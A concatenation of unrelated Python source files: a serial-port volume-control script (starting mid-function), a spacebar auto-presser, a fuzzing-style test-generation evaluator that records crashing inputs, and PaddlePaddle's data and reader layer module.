ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def setVolume(v):
subprocess.call(["osascript", "-e set volume output volume "+ str(v)])
return v
def scan_for_audio():
global prevA, serialPort, process
try:
new = int(serialPort.readline())# + (-100)
if prevA != new:
if type(process[0]) is multiprocessing.Process:
process[0].terminate()
process[0] = multiprocessing.Process(target=setVolume, args=(new,))
process[0].start()
prevA = new
subprocess.call(["clear"])
t = ("🔇" if new == 0 else "🔊" if new > 70 else "🔉" if new > 40 else "🔈") + str(new)
print(t)
except Exception as e:
print(e)
def scan_for_SC():
global prev_SC, serialPort, process
sliders = {
"0": 1,
"1": 2,
"2": 5,
"3": 7
}
try:
r = json.loads(serialPort.readline())# + (-100)
if r.values() != prev_SC.values:
subprocess.call(["clear"])
for p, v in r.items():
v = int(v)
if v >= prev_SC[p]+7:
inc_SC(sliders[p])
prev_SC[p] = v
elif v <= prev_SC[p]-7:
dec_SC(sliders[p])
prev_SC[p] = v
t = ("🔇" if v == 0 else "🔊" if v > 70 else "🔉" if v > 40 else "🔈") + str(v)
print(p+": ", t)
except Exception as e:
print(e)
def scan_for_TB():
global prev_TB, serialPort, process
sliders = {
"0": 1,
"1": 2,
}
slider_func = {
"0": set_TB_FX,
"1": set_TB_Vol,
}
slider_emoji = {
"0": ["💔 ", "❤️🩹 ", "❤️ ", "❤️🔥 "],
"1": ["🔇", "🔊", "🔉", "🔈"]
}
try:
r = json.loads(serialPort.readline())# + (-100)
if r.values() != prev_TB.values:
subprocess.call(["clear"])
for p, v in list(r.items())[:2]:
v = int(v)
if v != prev_TB[p]:
pr = int(p)
if type(process[pr]) is multiprocessing.Process:
process[pr].terminate()
process[pr] = multiprocessing.Process(target=slider_func[p], args=(v,))
process[pr].start()
prev_TB[p] = v
t = (slider_emoji[p][0] if v == 0 else slider_emoji[p][3] if v > 70 else slider_emoji[p][2] if v > 40 else slider_emoji[p][1]) + str(v)
print(p+": ", t)
except Exception as e:
print(e)
async def main():
global serialPort
while True:
if (serialPort.in_waiting > 0):
scan_for_TB()
if __name__ == '__main__':
prev_A = -1
prev_SC = {
"0": 100,
"1": 100,
"2": 100,
"3": 100
}
prev_TB = {
"0": 100,
"1": 100,
}
process = [None, None, None, None]
ports = list(filter((lambda x: "usb" in x), serial_ports()))
serial_com = ports[0]
if len(ports) > 1:
serial_com = ports[int(input("\n".join([str(i) + ": " + p for i, p in enumerate(ports)]) + "\nPort: "))]
serialPort = serial.Serial(port = serial_com, baudrate=9600,
bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
loop = asyncio.get_event_loop()
try:
asyncio.ensure_future(main())
loop.run_forever()
finally:
loop.close()
|
main.py
|
import random
import threading
import time
import winsound
import keyboard
def task():
t = threading.currentThread()
while getattr(t, 'do_run', True):
keyboard.press('space')
time.sleep(random.uniform(0.05, 0.1))
keyboard.release('space')
def main():
global thread
global is_active
is_active = False
def x():
global thread
global is_active
if not is_active:
thread = threading.Thread(target=task)
thread.start()
print('Started with a interval between 0.05 and 0.1 seconds.')
else:
thread.do_run = False
thread.join()
del thread
winsound.Beep(1500, 150)
print('Stopped.')
is_active = not is_active
print('Press {0} key to start. Press {0} key again to stop. Press CTRL+C to Exit.'.format('DEL'))
keyboard.add_hotkey('del', x)
try:
keyboard.wait()
except KeyboardInterrupt:
print('Exit.')
if __name__ == "__main__":
main()
|
functors.py
|
import sys
import subprocess
import utils
import struct
import signal
import os
import time
import threading
# Functors used for evaluation purposes
class EvalFunctors:
def __init__(self, ProbabilityMap, noEdgeProbability, Mapping, entryTemplate, tracerProcess):
self.ProbabilityMap = ProbabilityMap
self.noEdgeProbability = noEdgeProbability
self.Mapping = Mapping
self.tracerProcess = tracerProcess
self.parentWorker = None
self.entryTemplate = entryTemplate
#self.headerFtm = entryTemplate.hF
#self.headerSize = entryTemplate.hS
#self.offsetFtm = entryTemplate.oF
#self.offsetSize = entryTemplate.oS
# alignment = 4 # this is the header alignment. how can we get this from code ?
# alignmentMask = ~(alignment - 1)
# InputString is a stream of bytes that is needed to evaluate the program
# We take this and give it as input to the executable and we want to get the trace from it
def getTrace(self, inputString):
# in this method we run simpletracer using an output pipe and get the result (trace output) from that pipe
tracer = self.tracerProcess
utils.writeToProcess(1, tracer, 1, False) # Wake up process and give it a task payload
tracer.stdin.write(bytearray(inputString))
tracer.stdin.flush()
# Hangs: creates a background timeout thread that
# will send a halt signal if it's taking too long
timeout = 1
def timeoutCallback(tracer, timeout):
time.sleep(timeout)
tracer.send_signal(signal.SIGHUP)
timeoutThread = threading.Thread(target=timeoutCallback, args=(tracer, timeout))
timeoutThread.daemon = True # run in the background
timeoutThread.start()
# Read the size of the returned buffer and data
receivedOutputSize = tracer.stdout.read(4)
if receivedOutputSize == b'Payl':
print("Payload not found!")
exit(1)
# If process has crashed, saved the input and restart tracer
if len(receivedOutputSize) == 0:
# Wait for process returncode
tracer.wait()
# Save crash info
self.saveCrashData(tracer, inputString)
# Restart tracer process
self.parentWorker.updateTracerProcess()
# Interesting inputString
return None, 0
streamSize = struct.unpack("I", receivedOutputSize)[0]
# print(streamSize)
streamData = tracer.stdout.read(streamSize)
return streamData, streamSize
def saveCrashData(self, tracerProcess, inputString):
from utils import logsFullPath
error_type = {
signal.SIGHUP: 'hup',
signal.SIGINT: 'int',
signal.SIGQUIT: 'quit',
signal.SIGILL: 'ill',
signal.SIGTRAP: 'trap',
signal.SIGABRT: 'abrt',
signal.SIGBUS: 'bus',
signal.SIGFPE: 'fpe',
signal.SIGUSR1: 'usr1',
signal.SIGSEGV: 'segv',
signal.SIGUSR2: 'usr2',
signal.SIGPIPE: 'pipe',
signal.SIGALRM: 'alrm',
signal.SIGTERM: 'term'
}
signalCode = -tracerProcess.returncode
if logsFullPath == "":
logsFullPath = '/home/boc/genetic-algorithm-with-Spark-for-test-generation/logs'
folder = logsFullPath + '/crash/' + error_type[signalCode]
# Create folder if it doesn't exist
os.makedirs(folder, exist_ok=True)
# Create new file and save the input that caused the crash
from uuid import uuid4
from datetime import datetime
time = datetime.now()
time_str = "%d-%d-%d->%d-%d-%d" % (time.day, time.month, time.year,
time.hour, time.minute, time.second)
file_name = error_type[signalCode] + '-' + time_str + '-' + str(uuid4())[:8]
with open(folder + '/' + file_name + '.bin', 'wb') as f:
f.write(bytearray(inputString))
def processDataStream(self, dataStream, streamSize):
hashForEdges = set() # We don't count an edge if it appears twice
pathProbability = 1.0
# Caching some variables for faster access
entryType_TestName = self.entryTemplate.TN
entryType_Module = self.entryTemplate.TM
entryType_Offset = self.entryTemplate.TO
streamPos = 0
currModuleName = None
currentOffsetToEntryIndex = None
prevEntryIndex = -1
firstItem = 1
while streamPos < streamSize:
currOffset = -1
entry = utils.getNextEntryFromStream(dataStream, streamPos, self.entryTemplate)
type = entry[0]
len = entry[1]
moduleString = entry[2]
currOffset = entry[3]
cost = entry[4]
jumpType = entry[5]
entrySize = entry[6]
jumpInstruction = entry[7]
nInstructions = entry[8]
nextModule = entry[9]
nextoffset = entry[10]
streamPos += entrySize
if type == entryType_Module:
currModuleName = moduleString
currentOffsetToEntryIndex = self.Mapping[currModuleName] if currModuleName in self.Mapping else None # Update the current map to search to
elif type == entryType_Offset:
# use here currModuleName#offset
# Find the current entry index
currEntryIndex = -1
if currentOffsetToEntryIndex is not None and currOffset in currentOffsetToEntryIndex:
currEntryIndex = currentOffsetToEntryIndex[currOffset]
if firstItem == 0: # Don't compute probabilities for the first item because it can be misunderstood as no edge in probabilities graph
isNewEdge = True
bothNodesAreKnown = currEntryIndex != -1 and prevEntryIndex != -1
if bothNodesAreKnown: # If one of the node doesn't exist always consider it a new edge.
isNewEdge = not (prevEntryIndex, currEntryIndex) in hashForEdges
if isNewEdge:
hashForEdges.add((prevEntryIndex, currEntryIndex))
if isNewEdge:
edgeProb = self.getEdgeProbability(prevEntryIndex,
currEntryIndex) if bothNodesAreKnown else self.noEdgeProbability
pathProbability = pathProbability * edgeProb
firstItem = 0
prevEntryIndex = currEntryIndex
elif type == entryType_TestName:
continue # we are not interested in this type of data
return 1.0 - pathProbability
# Get the probability of an edge knowing the probability map and the
# noEdgeProbability value, as defined in the computeProbabilitiesMap function.
def getEdgeProbability(self, idA, idB):
neighbOfA = self.ProbabilityMap[idA] # get the dictionary of neighboors for node idA
if neighbOfA == None:
return self.noEdgeProbability
edgeValue = neighbOfA.get(idB)
return edgeValue if edgeValue != None else self.noEdgeProbability
# This function currently tests the program against an input,
# gets the Trace and computes the probability of the path.
# Fitness score is 1-pathProbability.
# We don't consider same edge twice.
# We must play/improve this a lot. E.g. - consider that first part of
# the path could be very common and this should influence less the costs.
def evaluate(self, inputString):
streamData, streamSize = self.getTrace(inputString)
return self.processDataStream(streamData, streamSize)
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import multiprocessing
import os
import six
import sys
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program, Variable
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
import logging
from ..data_feeder import check_dtype, check_type
__all__ = [
'data', 'read_file', 'double_buffer', 'py_reader',
'create_py_reader_by_data', 'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This operator creates the global variable. The global variables can be
accessed by all the following operators in the graph.
Note:
:code:`paddle.fluid.layers.data` is deprecated as it will be removed in
a later version. Please use :code:`paddle.fluid.data` .
This :code:`paddle.fluid.layers.data` set shape and dtype at compile
time but does NOT check the shape or the dtype of fed data, the
:code:`paddle.fluid.data` checks the shape and the dtype of data fed
by Executor or ParallelExecutor during run time.
To feed variable size inputs, users can feed variable size inputs
directly to this :code:`paddle.fluid.layers.data` and PaddlePaddle will
fit the size accordingly. Or set -1 on the variable dimension when using
:code:`paddle.fluid.data` .
The default :code:`stop_gradient` attribute of the Variable created by
this API is true, which means the gradient won't be passed backward
through the data Varaible. Set :code:`var.stop_gradient = False` If
user would like to pass backward gradient.
Args:
name(str): The name/alias of the variable, see :ref:`api_guide_Name`
for more details.
shape(list|tuple): Tuple declaring the shape. If :code:`append_batch_size` is
True and there is no -1 inside :code:`shape`, it should be
considered as the shape of the each sample. Otherwise, it should
be considered as the shape of the batched data.
append_batch_size(bool):
1. If true, it prepends -1 to the shape.
For example if shape=[1], the resulting shape is [-1, 1]. This will
be useful to set different batch size at run time.
2. If shape contains -1, such as shape=[1, -1].
append_batch_size will be enforced to be be False (ineffective)
because PaddlePaddle cannot set more than 1 unknown number on the
shape.
dtype(np.dtype|VarType|str): The type of the data. Supported dtype: bool,
float16, float32, float64, int8, int16, int32, int64, uint8.
type(VarType): The output type. Supported dtype: VarType.LOD_TENSOR,
VarType.SELECTED_ROWS, VarType.NCCL_ID. Default: VarType.LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
Default: 0.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Default: True.
Returns:
The global variable that gives access to the data.
Return Type:
Variable
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
check_type(name, 'name', (six.binary_type, six.text_type), 'data')
check_type(shape, 'shape', (list, tuple), 'data')
shape = list(shape)
for i in six.moves.range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
import paddle.fluid as fluid
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
from ..incubate.fleet.parameter_server.mode import DistributedMode
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'distributed_mode':
DistributedMode.SYNC, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, dummy_output=None, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma separated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
if dummy_output is None:
dummy_output = []
elif isinstance(dummy_output, Variable):
dummy_output = [dummy_output]
assert (type(dummy_output) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
outputs={"Out": dummy_output},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(
type="send_barrier",
inputs={"X": dummy_output},
outputs={"Out": []},
attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, dummy_input=None, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma separated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
if dummy_input is None:
dummy_input = []
elif isinstance(dummy_input, Variable):
dummy_input = [dummy_input]
assert (type(dummy_input) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": dummy_input},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(
type="fetch_barrier",
outputs={"Out": get_vars},
attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.desc.set_lod_levels(var.desc.lod_levels())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
def _py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True,
feed_list=None):
if feed_list is not None:
if not isinstance(feed_list, list):
raise TypeError("feed_list should be a list of Variable"
" instead of " + str(type(feed_list)))
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
else:
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
need_check_feed = [0 for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
if lod_levels is None:
lod_levels = [0] * len(shapes)
dtype_int = [int(t) for t in dtypes]
if name is None:
queue_name = unique_name('lod_tensor_blocking_queue')
reader_name = unique_name('create_py_reader')
double_buffer_name = unique_name('double_buffer')
else:
queue_name = "_".join([name, "queue"])
reader_name = "_".join([name, "reader"])
double_buffer_name = "_".join([name, "double_buffer"])
var = global_scope().var(queue_name)
feed_queue = core.init_lod_tensor_blocking_queue(var, capacity, False)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=reader_name)
startup_blk.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
reader = monkey_patch_reader_methods(main_prog_var)
if use_double_buffer:
double_buffer_reader = double_buffer(reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
# monkey patch py_reader special methods
reader.queue = feed_queue
current_reset_method = reader.reset
reader.thread = None
reader.tensor_provider = None
reader.exited = False
def start_provide_thread(func):
def __provider_thread__():
try:
for tensors in func():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if reader.exited:
break
feed_queue.push(array)
if reader.exited:
break
feed_queue.close()
except Exception as ex:
feed_queue.kill()
logging.warn('Your decorated reader has raised an exception!')
six.reraise(*sys.exc_info())
reader.thread = threading.Thread(target=__provider_thread__)
reader.thread.daemon = True
reader.thread.start()
def __set_tensor_provider__(func):
reader.tensor_provider = func
def __set_paddle_reader__(paddle_reader):
with program_guard(Program(), Program()):
actual_feed_list = feed_list
if actual_feed_list is None:
actual_feed_list = []
counter = 0
for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels):
name = str(counter)
actual_feed_list.append(
data(
name=name,
dtype=dtype,
shape=shape,
lod_level=lod_level))
counter += 1
data_names = [feed_data.name for feed_data in actual_feed_list]
feeder = DataFeeder(
feed_list=actual_feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(
paddle_reader, multi_devices=False)
def __tensor_provider__():
for slots in paddle_reader():
yield [slots[data_name] for data_name in data_names]
__set_tensor_provider__(__tensor_provider__)
def __reset__():
current_reset_method()
if reader.thread is not None and reader.tensor_provider is not None:
reader.exited = True
reader.thread.join()
reader.exited = False
def __start__():
start_provide_thread(reader.tensor_provider)
reader.reset = __reset__
reader.decorate_tensor_provider = __set_tensor_provider__
reader.decorate_paddle_reader = __set_paddle_reader__
reader.decorate_batch_generator = __set_tensor_provider__
reader.decorate_sample_list_generator = __set_paddle_reader__
reader.start = __start__
return reader
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
:api_attr: Static Graph
Create a Python reader for data feeding in Python
This operator returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source and feed the data from the data source to the Reader Variable.
When :code:`Executor::Run()` is invoked in C++ side, the data from the
generator would be read automatically. Unlike :code:`DataFeeder.feed()`,
the data reading process and :code:`Executor::Run()` process can run in
parallel using :code:`py_reader`. The :code:`start()` method of the Reader
should be called when each pass begins, while the :code:`reset()` method
should be called when the pass ends and :code:`fluid.core.EOFException` raises.
Note:
:code:`Program.clone()` method cannot clone :code:`py_reader`. You can
refer to :ref:`api_fluid_Program` for more details.
The :code:`read_file` call needs to be in the program block of :code:`py_reader`.
You can refer to :ref:`api_fluid_layers_read_file` for more details.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes. shapes[i]
represents the i-th data shape.
dtypes(list|tuple): List of strings which declaring data type. Supported dtype:
bool, float16, float32, float64, int8, int16, int32, int64, uint8.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
use_double_buffer(bool): Whether use double buffer or not. The double buffer is
for pre-reading the data of the next batch and copy the data asynchronously
from CPU to GPU. Default is True.
Returns:
A Reader from which we can get feeding data.
Return Type:
Variable
Examples:
1. The basic usage of :code:`py_reader` is as follows:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(image, label):
# user defined network, here a softmax regession example
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=1000))
img, label = fluid.layers.read_file(reader)
loss = network(img, label)
fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program())
exe = fluid.ParallelExecutor(use_cuda=True)
for epoch_id in range(10):
reader.start()
try:
while True:
exe.run(fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
fluid.io.save_inference_model(dirname='./model',
feeded_var_names=[img.name, label.name],
target_vars=[loss],
executor=fluid.Executor(fluid.CUDAPlace(0)))
2. When training and testing are both performed, two different
:code:`py_reader` should be created with different names, e.g.:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(reader):
img, label = fluid.layers.read_file(reader)
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
# Create train_main_prog and train_startup_prog
train_main_prog = fluid.Program()
train_startup_prog = fluid.Program()
with fluid.program_guard(train_main_prog, train_startup_prog):
# Use fluid.unique_name.guard() to share parameters with test program
with fluid.unique_name.guard():
train_reader = fluid.layers.py_reader(capacity=64,
shapes=[(-1, 1, 28, 28),
(-1, 1)],
dtypes=['float32', 'int64'],
name='train_reader')
train_reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5),
buf_size=500))
train_loss = network(train_reader) # some network definition
adam = fluid.optimizer.Adam(learning_rate=0.01)
adam.minimize(train_loss)
# Create test_main_prog and test_startup_prog
test_main_prog = fluid.Program()
test_startup_prog = fluid.Program()
with fluid.program_guard(test_main_prog, test_startup_prog):
# Use fluid.unique_name.guard() to share parameters with train program
with fluid.unique_name.guard():
test_reader = fluid.layers.py_reader(capacity=32,
shapes=[(-1, 1, 28, 28), (-1, 1)],
dtypes=['float32', 'int64'],
name='test_reader')
test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512))
test_loss = network(test_reader)
fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog)
fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog)
train_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=train_loss.name,
main_program=train_main_prog)
test_exe = fluid.ParallelExecutor(use_cuda=True,
loss_name=test_loss.name,
main_program=test_main_prog)
for epoch_id in range(10):
train_reader.start()
try:
while True:
train_exe.run(fetch_list=[train_loss.name])
except fluid.core.EOFException:
train_reader.reset()
test_reader.start()
try:
while True:
test_exe.run(fetch_list=[test_loss.name])
except fluid.core.EOFException:
test_reader.reset()
"""
logging.warn(
'paddle.fluid.layers.py_reader() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=shapes,
dtypes=dtypes,
lod_levels=lod_levels,
name=name,
use_double_buffer=use_double_buffer)
def create_py_reader_by_data(capacity,
feed_list,
name=None,
use_double_buffer=True):
"""
:api_attr: Static Graph
The OP creates a Python reader for data feeding in Python, it is similar
to :ref:`api_fluid_layers_py_reader` except that it can read data from
the list of feed variables.
Parameters:
capacity (int): The buffer capacity maintained by :code:`py_reader`. Its unit
is batch number. Set larger :attr:`capacity` if the reader is fast.
feed_list (list(Variable)): The feed variables, are usually created by
:code:`fluid.data()`.
name (str, optional): Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`. Default: None.
use_double_buffer (bool, optional): Whether use double buffer. If it's True,
the OP would prefetch next batch data asynchronously. Default: True.
Returns:
Reader: A Reader for data feeding. The data types of read data are the same as the data types of variables of :attr:`feed_list`.
Examples:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import paddle.dataset.mnist as mnist
def network(img, label):
# User defined network. Here a simple regression as example
predict = fluid.layers.fc(input=img, size=10, act='softmax')
loss = fluid.layers.cross_entropy(input=predict, label=label)
return fluid.layers.mean(loss)
MEMORY_OPT = False
USE_CUDA = False
image = fluid.data(name='image', shape=[None, 1, 28, 28], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.layers.create_py_reader_by_data(capacity=64,
feed_list=[image, label])
reader.decorate_paddle_reader(
paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500))
img, label = fluid.layers.read_file(reader)
loss = network(img, label) # The definition of custom network and the loss function
place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
build_strategy = fluid.BuildStrategy()
build_strategy.memory_optimize = True if MEMORY_OPT else False
exec_strategy = fluid.ExecutionStrategy()
compiled_prog = fluid.compiler.CompiledProgram(
fluid.default_main_program()).with_data_parallel(
loss_name=loss.name,
build_strategy=build_strategy,
exec_strategy=exec_strategy)
for epoch_id in range(2):
reader.start()
try:
while True:
exe.run(compiled_prog, fetch_list=[loss.name])
except fluid.core.EOFException:
reader.reset()
"""
logging.warn(
'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. '
'Please use paddle.fluid.io.DataLoader.from_generator() instead.')
return _py_reader(
capacity=capacity,
shapes=None,
dtypes=None,
lod_levels=None,
name=name,
use_double_buffer=use_double_buffer,
feed_list=feed_list)
def __create_shared_decorated_reader__(op_type, reader, attrs):
var_name = unique_name(op_type)
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startop_op = startup_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [startup_var]},
attrs=attrs)
startup_var.persistable = True
main_prog_block = default_main_program().current_block()
main_prog_var = _copy_reader_var_(main_prog_block, startup_var)
_copy_reader_create_op_(main_prog_block, startop_op)
return monkey_patch_reader_methods(main_prog_var)
def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None):
new_reader_name = name if name is not None else unique_name(op_type)
main_blk = default_main_program().current_block()
new_reader = main_blk.create_var(name=new_reader_name)
main_blk.append_op(
type=op_type,
inputs={'UnderlyingReader': reader},
outputs={'Out': [new_reader]},
attrs=attrs)
return monkey_patch_reader_methods(new_reader)
def double_buffer(reader, place=None, name=None):
"""
